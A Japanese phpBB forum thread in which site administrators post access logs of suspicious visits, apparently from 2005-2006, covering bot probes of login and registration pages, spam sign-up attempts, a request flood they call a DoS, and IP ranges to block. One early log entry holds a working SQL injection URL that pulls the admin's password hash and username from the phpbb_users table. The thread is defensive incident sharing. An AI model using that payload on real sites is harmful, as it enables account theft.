webmaster
うぇぶますた

| 登録日: 2005.03.15 |
| 記事: 72 |
| 所在地: hiikun.net |
|
当サイトおよび hiikun の phpBB サイトにアクセスしてきた不審なアクセスのログを公開します。
|
|
webmaster
うぇぶますた

| 登録日: 2005.03.15 |
| 記事: 72 |
| 所在地: hiikun.net |
|
2005-05-05 05:30:59
▼
2005-05-05 05:35:20
1115238659 5 576765 212.138.113.16 http://support.hiikun.net/phpbb2/ezdloads.php http://www.google.com.sa/search?q=phpbb2.0.13&hl=ar&lr=&start=20&sa=N Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705; SpamBlockerUtility 4.6.1) 1024 768 32 1.1 C6200A (NetCache NetApp/5.5R5), 1.0 cache6.ruh 84.22.244.138
1115238738 5 576765 212.138.47.14 cache4-1.ruh.isu.net.sa http://support.hiikun.net/phpbb2/ezdloads.php http://www.google.com.sa/search?q=phpbb2.0.13&hl=ar&lr=&start=20&sa=N Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705; SpamBlockerUtility 4.6.1) 1024 768 32 1.1 C6200A (NetCache NetApp/5.5R5), 1.0 cache4.ruh 84.22.244.138
1115238860 5 576765 212.138.47.26 http://support.hiikun.net/phpbb2/dlman.php?func=file_info&file_id=-1337/**/union/**/select/**/0,0,0,user_password,0,username,0,0,0,0,0,0,0,0,0,0 ,0,0/**/FROM/**/phpbb_users/**/WHERE/**/user_id=2/**/ Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705; SpamBlockerUtility 4.6.1) 1024 768 32 1.1 C6200A (NetCache NetApp/5.5R5), 1.0 cache8.ruh 84.22.244.138
1115238920 5 576765 212.138.47.20 cache10-4.ruh.isu.net.sa http://support.hiikun.net/phpbb2/forum/ Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705; SpamBlockerUtility 4.6.1) 1024 768 32 1.1 C6200A (NetCache NetApp/5.5R5), 1.0 cache10.ruh 84.22.244.138
1115238879 5 576765 212.138.47.20 cache10-4.ruh.isu.net.sa http://support.hiikun.net/phpbb2/search.php http://support.hiikun.net/phpbb2/dlman.php?func=file_info&file_id=-1337/**/union/**/select/**/0,0,0,user_password,0,username,0,0,0,0,0,0,0,0,0,0 ,0,0/**/FROM/**/phpbb_users/**/WHERE/**/user_id=2/**/ Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705; SpamBlockerUtility 4.6.1) 1024 768 32 1.1 C6200A (NetCache NetApp/5.5R5), 1.0 cache10.ruh 84.22.244.138 |
Google で phpbb2.0.13 として検索して来てます。
サウジアラビアからのアクセスかな。プロキシを使って来てますね。
JavaScript のアクセス解析に引っかかったので、手動みたいです。
チートプログラムでアタックしてきてる可能性もありますけどね。それはこのログには残りません。
|
|
webmaster
うぇぶますた

| 登録日: 2005.03.15 |
| 記事: 72 |
| 所在地: hiikun.net |
|
最近、こういうアクセスが1日に数回あります。▼
2006 - 1/14 - 17:43:04
Windows XP Explorer 6.0
IP: 72.36.223.73
ホスト: 72.36.223.73.reverse.layeredtech.com
時間 閲覧ページ [3]
17:43:04 /
17:43:05 //login.php
17:43:06 //posting.php
2006 - 1/14 - 17:57:44
Windows XP Explorer 6.0
IP: 66.98.250.94
ホスト: serv.slavhost.ru
時間 閲覧ページ [3]
17:57:44 /
17:57:46 //login.php
17:57:47 //posting.php |
みなさんの処には来てますか?
このログは、PHP でゲットするタイプのアクセス解析に記録されたものなんですけど、JavaScript 埋め込みのアクセス解析には記録されてないので、これらのアクセスは恐らくスクリプト攻撃かと思います。
以前来たものには、上記の URI に併せて、//profile.php というのもありました。
旧版の脆弱性につけ込んだものかもしれません。お気を付けを。
ちなみに、これらは phpBB Security 1.0.1 ではブロックできないようです。(最新版は知りませんが)
|
|
webmaster
うぇぶますた

| 登録日: 2005.03.15 |
| 記事: 72 |
| 所在地: hiikun.net |
|
| webmaster の記述を引用: | | 最近、こういうアクセスが1日に数回あります。▼ |
なんかご来店ペースが数回どころじゃあなくなってきたかも。
2006 - 1/15 - 13:13:43
Windows XP Explorer 6.0
IP: 72.36.244.202
ホスト: 72.36.244.202.reversedns.resolve.ru
時間 閲覧ページ [2]
13:13:43 //login.php
13:13:45 //posting.php
2006 - 1/15 - 16:16:14
Windows XP Explorer 6.0
IP: 80.77.87.2
時間 閲覧ページ [4]
16:16:14 //profile.php
16:16:14 //login.php
16:16:17 //
16:16:22 //posting.php |
|
|
webmaster
うぇぶますた

| 登録日: 2005.03.15 |
| 記事: 72 |
| 所在地: hiikun.net |
|
| 引 用: | 2006 - 1/15 - 20:01:45
Windows XP Explorer 6.0
IP: 72.36.244.202
ホスト: 72.36.244.202.reversedns.resolve.ru
時間 閲覧ページ [2]
20:01:45 //login.php
20:01:47 //posting.php
2006 - 1/16 - 06:47:40
Windows XP Explorer 6.0
IP: 72.36.223.73
ホスト: 72.36.223.73.reverse.layeredtech.com
時間 閲覧ページ [3]
06:47:40 /
06:47:42 //login.php
06:47:43 //posting.php |
いつも同じ帯域からなんで、.htaccess に IPマスクでシャットアウトした方が良さそうですね。
参考にどうぞ。▼
72.36.128.0 - 72.36.255.255
CIDR: 72.36.128.0/17
80.77.80.0 - 80.77.95.255
CIDR: 80.77.80.0/20
66.98.128.0 - 66.98.255.255
CIDR: 66.98.128.0/17 |
|
|
hiikun
あどみん

| 登録日: 2005.03.16 |
| 記事: 830 |
| 所在地: 大阪府 |
|
2006 - 2/9 - 14:13:51
OS ブラウザー 画面解像度 色 IP
Windows 98 Explorer 6.0 ? 216.195.42.191
ホスト: sys106.3fn.net
時間 閲覧ページ [1]
14:13:51 /phpbb2/post-1046.html/phpBB2/profile.php
2006 - 2/9 - 20:06:36
OS ブラウザー 画面解像度 色 IP
Windows 98 Explorer 6.0 ? 216.195.42.191
ホスト: sys106.3fn.net
時間 閲覧ページ [1]
20:06:36 /phpbb2/topic-179.html/phpBB2/profile.php
2006 - 2/9 - 21:17:24
OS ブラウザー 画面解像度 色 IP
Windows XP Explorer 6.0 ? 65.98.25.10
言語: 英語
ホスト: astro.hostdome.com
時間 閲覧ページ [1]
21:17:24 /phpbb2/post-1046.html/phpBB2/profile.php?mode=register&agreed=true
2006 - 2/9 - 22:21:10
OS ブラウザー 画面解像度 色 IP
Windows XP Explorer 6.0 ? 65.98.25.10
言語: 英語
ホスト: astro.hostdome.com
時間 閲覧ページ [9]
22:21:10 /phpbb2/topic-179.html/phpBB2/profile.php?mode=register&agreed=true
23:07:42 /phpbb2/topic-217.html/phpBB2/profile.php?mode=register&agreed=true
00:01:06 /phpbb2/post-1087.html/phpBB2/profile.php?mode=register&agreed=true
00:01:06 /phpbb2/post-1087.html/phpBB2/profile.php?mode=register&agreed=true
00:56:56 /phpbb2/post-1080.html/phpBB2/profile.php?mode=register&agreed=true
01:18:38 /phpbb2/topic-223.html/phpBB2/profile.php?mode=register&agreed=true
01:18:38 /phpbb2/topic-223.html/phpBB2/profile.php?mode=register&agreed=true
01:20:14 /phpbb2/profile.php?mode=register&agreed=true
01:24:58 /phpbb2/post-428.html/phpBB2/profile.php?mode=register&agreed=true |
|
|
hiikun
あどみん

| 登録日: 2005.03.16 |
| 記事: 830 |
| 所在地: 大阪府 |
|
2006 - 2/10 - 01:14:41
OS ブラウザー 画面解像度 色 IP
Windows XP Explorer 6.0 ? 83.222.30.40
時間 閲覧ページ [1]
01:14:41 /phpbb2//profile.php
2006 - 2/10 - 04:48:44
OS ブラウザー 画面解像度 色 IP
Windows 98 Explorer 6.0 ? 216.195.42.191
ホスト: sys106.3fn.net
時間 閲覧ページ [1]
04:48:44 /phpbb2/topic-217.html/phpBB2/profile.php |
|
|
hiikun
あどみん

| 登録日: 2005.03.16 |
| 記事: 830 |
| 所在地: 大阪府 |
|
2006 - 2/11 - 04:47:06
OS ブラウザー 画面解像度 色 IP
Windows ME Explorer 5.5 ? 216.195.42.191
ホスト: sys106.3fn.net
時間 閲覧ページ [1]
04:47:06 /?phpBB2%2F%E6%97%A5%E6%9C%AC%E8%AA%9E%E7%89%88/phpBB2/profile.php
2006 - 2/11 - 07:00:29
OS ブラウザー 画面解像度 色 IP
Windows XP Explorer 6.0 ? 61.135.132.202
時間 閲覧ページ [1]
07:00:29 /phpbb2//profile.php
2006 - 2/11 - 07:07:52
OS ブラウザー 画面解像度 色 IP
Windows XP Explorer 6.0 ? 195.246.6.222
時間 閲覧ページ [1]
07:07:52 /phpbb2/post-1072.html/phpBB2/
2006 - 2/11 - 07:14:08
OS ブラウザー 画面解像度 色 IP
Windows XP Explorer 6.0 ? 202.129.12.14
時間 閲覧ページ [1]
07:14:08 /phpbb2/topic-223.html/phpBB2/
2006 - 2/11 - 07:57:03
OS ブラウザー 画面解像度 色 IP
Windows XP Explorer 6.0 ? 83.222.30.40
時間 閲覧ページ [1]
07:57:03 /phpbb2//profile.php
2006 - 2/11 - 09:02:21
OS ブラウザー 画面解像度 色 IP
Windows XP Explorer 6.0 ? 67.53.234.190
ホスト: rrcs-67-53-234-190.west.biz.rr.com
時間 閲覧ページ [2]
09:02:21 /phpbb2//profile.php
09:02:24 /phpbb2/
2006 - 2/11 - 09:10:03
OS ブラウザー 画面解像度 色 IP
Windows XP Explorer 6.0 ? 84.52.77.3
ホスト: 3.77.kubinskay.westcall.net
時間 閲覧ページ [2]
09:10:03 /phpbb2//profile.php
09:10:10 /phpbb2/
2006 - 2/11 - 09:10:41
OS ブラウザー 画面解像度 色 IP
Windows XP Explorer 6.0 ? 217.170.128.181
時間 閲覧ページ [2]
09:10:41 /phpbb2//profile.php
09:10:45 /phpbb2/
2006 - 2/11 - 10:15:37
OS ブラウザー 画面解像度 色 IP
Windows XP Explorer 6.0 ? 200.122.153.250
ホスト: ContentPrincipal.racsa.co.cr
時間 閲覧ページ [1]
10:15:37 /phpbb2/topic-215.html/phpBB2/
2006 - 2/11 - 10:23:14
OS ブラウザー 画面解像度 色 IP
Windows XP Explorer 6.0 ? 219.21.44.35
ホスト: softbank219021044035.bbtec.net
時間 閲覧ページ [1]
10:23:14 /phpbb2/topic-155.html/phpBB2/
2006 - 2/11 - 10:42:42
OS ブラウザー 画面解像度 色 IP
Windows XP Explorer 6.0 ? 70.106.6.27
ホスト: www.biohealthbase.org
時間 閲覧ページ [1]
10:42:42 /phpbb2/post-745.html/phpBB2/
2006 - 2/11 - 10:56:55
OS ブラウザー 画面解像度 色 IP
Windows XP Explorer 6.0 ? 200.87.6.6
時間 閲覧ページ [13]
10:56:55 /phpbb2/post-1022.html/phpBB2/
10:57:01 /phpbb2/post-1022.html/phpBB2/ntopic-43.html&sid=4806f44763681404774d33e558215393
10:57:01 /phpbb2/post-1022.html/phpBB2/ptopic-43.html&sid=4806f44763681404774d33e558215393
10:57:01 /phpbb2/post-1022.html/phpBB2/forum-3.html&sid=4806f44763681404774d33e558215393
10:57:01 /phpbb2/post-1022.html/phpBB2/forum-9.html&sid=4806f44763681404774d33e558215393
10:57:01 /phpbb2/post-1022.html/phpBB2/faq.php
10:57:01 /phpbb2/post-1022.html/phpBB2/forum-4.html&sid=4806f44763681404774d33e558215393
10:57:01 /phpbb2/post-1022.html/phpBB2/forum-1.html&sid=4806f44763681404774d33e558215393
10:57:01 /phpbb2/post-1022.html/phpBB2/search.php
10:57:01 /phpbb2/post-1022.html/phpBB2/forum-10.html&sid=4806f44763681404774d33e558215393
10:57:01 /phpbb2/post-1022.html/phpBB2/memberlist.php
10:57:01 /phpbb2/post-1022.html/phpBB2/forum-2.html&sid=4806f44763681404774d33e558215393
10:57:01 /phpbb2/post-1022.html/phpBB2/forum-6.html&sid=4806f44763681404774d33e558215393
2006 - 2/11 - 11:32:24
OS ブラウザー 画面解像度 色 IP
Windows XP Explorer 6.0 ? 216.195.42.191
ホスト: sys106.3fn.net
時間 閲覧ページ [1]
11:32:24 /phpbb2/post-1080.html/phpBB2/profile.php |
04:47:06 の分は、PukiWiki に対しての攻撃ですわ。アホと言うかマヌケですな。
10:57:01 の分は、もう DoS ですね。
|
|
hiikun
あどみん

| 登録日: 2005.03.16 |
| 記事: 830 |
| 所在地: 大阪府 |
|
2006 - 2/27 - 00:07:38
OS ブラウザー 画面解像度 色 IP
Windows 2000 Explorer 6.0 ? 63.223.75.193
時間 閲覧ページ [90]
00:07:38 /phpbb2/forum-4.html/phpbb2
00:07:42 /phpbb2/forum-4.html/posting.php?mode=newtopic&f=4
00:07:42 /phpbb2/
00:07:45 /phpbb2/forum-4.html/forum-4.html&a...0ac3d76bf55f7cdb467c8b34f48847
00:07:48 /phpbb2/forum-9.html&sid=8e65079e62d2bf04839e3f819a4e41eb
00:07:48 /phpbb2/404.php
00:07:48 /phpbb2/forum-4.html/posting.php?mode=newtopic&f=4
00:07:49 /phpbb2/404.php
00:07:50 /phpbb2/forum-4.html
00:07:50 /phpbb2/forum-4.html
00:07:51 /phpbb2/forum-4.html/forum-2.html
00:07:52 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=4
00:07:52 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=4
00:07:53 /phpbb2/forum-4.html/posting.php?mode=newtopic&f=4
00:07:54 /phpbb2/profile.php?mode=register
00:07:54 /phpbb2/profile.php?mode=register
00:07:55 /phpbb2/post-1004.html/phpbb2
00:07:55 /phpbb2/profile.php?mode=register&agreed=true
00:07:56 /phpbb2/forum-4.html/forum-5.html
00:07:56 /phpbb2/profile.php?mode=register&agreed=true
00:07:58 /phpbb2/forum-4.html/posting.php?mode=newtopic&f=4
00:07:59 /phpbb2/profile.php
00:07:59 /phpbb2/profile.php
00:08:00 /phpbb2/post-1022.html/phpbb2
00:08:00 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=4
00:08:00 /phpbb2/forum-4.html/forum-6.html
00:08:01 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=4
00:08:01 /phpbb2/login.php
00:08:02 /phpbb2/forum-4.html/posting.php?mode=newtopic&f=4
00:08:02 /phpbb2/login.php
00:08:03 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=4
00:08:04 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=4
00:08:04 /phpbb2/forum-4.html
00:08:05 /phpbb2/post-1022.html/posting.php
00:08:05 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=4
00:08:05 /phpbb2/post-1004.html/posting.php
00:08:06 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=4
00:08:07 /phpbb2/forum-4.html/posting.php?mode=newtopic&f=4
00:08:07 /phpbb2/post-1046.html/phpbb2
00:08:07 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=4
00:08:08 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=4
00:08:09 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=4
00:08:09 /phpbb2/post-1046.html/posting.php
00:08:10 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=4
00:08:11 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=4
00:08:12 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=4
00:08:13 /phpbb2/post-1066.html/phpbb2
00:08:13 /phpbb2/post-1072.html/phpbb2
00:08:14 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=4
00:08:14 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=9
00:08:15 /phpbb2/post-1066.html/posting.php
00:08:15 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=4
00:08:15 /phpbb2/profile.php?mode=register
00:08:15 /phpbb2/post-1079.html/phpbb2
00:08:16 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=4
00:08:17 /phpbb2/post-1080.html/phpbb2
00:08:18 /phpbb2/post-1072.html/posting.php
00:08:18 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=4
00:08:19 /phpbb2/post-1087.html/phpbb2
00:08:19 /phpbb2/post-1079.html/posting.php
00:08:19 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=4
00:08:19 /phpbb2/post-428.html/phpbb2
00:08:19 /phpbb2/post-1080.html/posting.php
00:08:21 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=4
00:08:21 /phpbb2/post-745.html/phpbb2
00:08:21 /phpbb2/post-1087.html/posting.php
00:08:22 /phpbb2/post-428.html/posting.php
00:08:22 /phpbb2/post-771.html/phpbb2
00:08:22 /phpbb2/topic-155.html/phpbb2
00:08:23 /phpbb2/post-745.html/posting.php
00:08:24 /phpbb2/topic-179.html/phpbb2
00:08:25 /phpbb2/topic-179-0.html/phpbb2
00:08:25 /phpbb2/topic-155.html/posting.php
00:08:25 /phpbb2/post-771.html/posting.php
00:08:26 /phpbb2/topic-214.html/phpbb2
00:08:26 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=9
00:08:27 /phpbb2/topic-215.html/phpbb2
00:08:27 /phpbb2/topic-217.html/phpbb2
00:08:28 /phpbb2/topic-223.html/phpbb2
00:08:29 /phpbb2/topic-179.html/posting.php
00:08:29 /phpbb2/topic-215.html/posting.php
00:08:30 /phpbb2/topic-225.html/phpbb2
00:08:30 /phpbb2/topic-217.html/posting.php
00:08:30 /phpbb2/topic-179-0.html/posting.php
00:08:31 /phpbb2/topic-214.html/posting.php
00:08:31 /phpbb2/topic-65.html/phpbb2
00:08:32 /phpbb2/topic-223.html/posting.php
00:08:33 /phpbb2/topic-225.html/posting.php
00:08:36 /phpbb2/topic-65.html/posting.php
00:09:07 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=9 |
DoS です。
最初の 00:07:38 と、最後の 00:09:07 前後あたりは手動のようですが、あと他のはスクリプトによる攻撃なんでしょうねえ。
http://www.whois.sc/63.223.75.193
Beyond The Network America, Inc.
NetRange: 63.216.0.0 - 63.223.255.255
CIDR: 63.216.0.0/13
|
|
hiikun
あどみん

| 登録日: 2005.03.16 |
| 記事: 830 |
| 所在地: 大阪府 |
|
2006 - 3/3 - 12:47:43
OS ブラウザー 画面解像度 色 IP
Windows 2000 Explorer 6.0 ? 63.223.66.85
時間 閲覧ページ [20]
12:47:43 /phpbb2/
12:47:46 /phpbb2/forum-1.html&sid=c5cbbf2410d8b028c075cc5aaab78ea8
12:47:49 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=1
12:47:50 /phpbb2/profile.php?mode=register
12:47:51 /phpbb2/profile.php?mode=register&agreed=true
12:47:53 /phpbb2/
12:47:53 /phpbb2/profile.php
12:47:54 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=1
12:47:55 /phpbb2/login.php
12:47:55 /phpbb2/forum-1.html&sid=5c26d662bc4aa592d0b578a736696941
12:47:57 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=1
12:47:58 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=1
12:47:58 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=1
12:47:59 /phpbb2/profile.php?mode=register
12:48:00 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=1
12:48:01 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=1
12:48:01 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=1
12:48:02 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=1
12:48:02 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=1
12:48:04 /phpbb2/login.php?redirect=posting.php&mode=newtopic&f=1 |
書き込みとユーザー登録の試行で、1秒以内に2回ずつの連チャンです。
http://www.whois.sc/63.223.66.85
Beyond The Network America, Inc.
NetRange: 63.216.0.0 - 63.223.255.255
CIDR: 63.216.0.0/13
2回目なので、403誘導に確定です。
|
|